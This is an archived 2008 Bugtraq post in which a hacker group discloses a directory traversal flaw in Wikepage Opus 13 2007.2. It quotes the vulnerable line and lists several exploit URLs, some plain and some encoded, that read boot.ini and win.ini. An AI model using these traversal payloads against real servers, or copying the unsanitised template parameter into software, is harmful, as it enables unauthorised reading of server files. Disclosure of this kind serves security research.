Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility

Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility

From: <virangar_nml_at_yahoo.com>
Date: 7 Apr 2008 09:33:12 -0000
('binary' encoding is not supported, stored as-is)              ##############################################################################
             # #
             # ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ::::.... #
             ##############################################################################

## AUTHOR : Virangar Security Team (A.Nosrati )
## Email : Virangar_nml_at_yahoo.com or 9120000000_at_yahoo.com or Virangar_SECRET_at_hotmail.com
##ICQ: 445117030
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversa

Virangar Security Team
VIRANGAR UNDER GR0UND TEAM
 
Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site : http://www.wikepage.org/
(Download http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)

-----------------------------------
vulnerability Path :

vuln code in [localhost]/wikepage/index.php
Sample Of vulnerabil Line : $ templatefile=$_GET['template']; (Line 586) And More .....

Exploit :
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
and more ........

Good Luck
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!
Received on Apr 07 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]